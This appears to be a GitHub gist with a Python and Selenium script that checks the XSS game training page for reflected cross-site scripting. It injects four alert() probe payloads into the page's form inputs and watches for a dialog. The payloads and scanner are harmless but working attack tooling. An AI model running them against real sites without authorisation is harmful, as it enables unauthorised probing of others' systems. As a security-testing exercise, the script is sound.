
@miglen
Created February 25, 2022 09:53
Simple automated XSS check with selenium
import sys
import time
import urllib.parse

import requests
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException
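# Page under test: level 1 of the XSS game training application.
url = "https://xss-game.appspot.com/level1/frame"

# Fetch the page once to learn which input names its form exposes.
# The timeout keeps the script from hanging on an unresponsive host, and
# raise_for_status() stops early instead of parsing an error page.
response = requests.get(url, timeout=10)
response.raise_for_status()

# Name the parser explicitly: without it bs4 picks whichever parser happens to
# be installed and warns about it, so results can differ between machines.
soup = BeautifulSoup(response.text, "html.parser")
form = soup.find('form')
if form is None:
    # Everything below iterates over the form's inputs; fail with a clear
    # message rather than an AttributeError on None.
    raise SystemExit(f"No <form> found at {url}; nothing to test")
print()

# Probe strings. Each one calls alert() with a different number.
# The last two are URL-scheme strings: they can only fire when the value is
# reflected into a URL-bearing attribute, not when it is echoed as HTML text.
payloads = [
    "<img src=x onerror=alert(1)>",
    "<script>alert(2)</script>",
    "data:text/plain,alert(3)",
    "javascript:alert(4)"
]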
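def encode_url(url, params):
    """Return *url* with *params* appended to its query string.

    The parameters are percent-encoded with ``urllib.parse.urlencode``, so
    characters such as ``<``, ``>`` and spaces in a value cannot break the
    URL structure.

    Unlike plain ``url + "?" + query`` concatenation, this keeps the result
    well-formed when *url* already has a query string (the new pairs are
    joined with ``&``) or a fragment (the query goes before the ``#``).
    When *params* is empty and *url* has no query, *url* is returned
    without a trailing ``?``.

    Args:
        url: Absolute URL of the page to request.
        params: Mapping (or sequence of pairs) of parameter names to values.

    Returns:
        The full URL as a string.
    """
    parts = urllib.parse.urlsplit(url)
    params_encoded = urllib.parse.urlencode(params)
    # Skip empty pieces so no stray "&" or "?" is left in the result.
    query = "&".join(piece for piece in (parts.query, params_encoded) if piece)
    return urllib.parse.urlunsplit(parts._replace(query=query))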
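# Try each payload in turn: fill every named input of the form with it, load
# the resulting URL in a real browser and check whether a JavaScript alert
# dialog opened.
#
# Limitations of this check, visible from the code:
#   * the request is always a GET against the page URL; the form's own
#     action and method attributes are not consulted;
#   * only payloads that open an alert() dialog within one second of page
#     load are detected, so a silent result is not proof of safety.
for payload in payloads:
    # `field` rather than `input`, so the builtin input() is not shadowed.
    params = {
        field['name']: payload
        for field in form.find_all('input')
        if field.has_attr('name')
    }
    url_to_send = encode_url(url, params)

    browser = webdriver.Firefox()
    try:
        browser.get(url_to_send)
        time.sleep(1)  # give the page a moment to run its scripts
        try:
            alert_text = browser.switch_to.alert.text
        except NoAlertPresentException:
            # No dialog means this payload did not execute. Without this
            # handler the first non-firing payload would abort the whole run.
            alert_text = None
        if alert_text is not None:
            print(f"XSS Found in: {url} with : {params}")
    finally:
        # Always close the browser, including on errors, so a run does not
        # leave one Firefox process behind per payload.
        browser.quit()

# Exit only after every payload has been tried, so all hits are reported.
sys.exit(0)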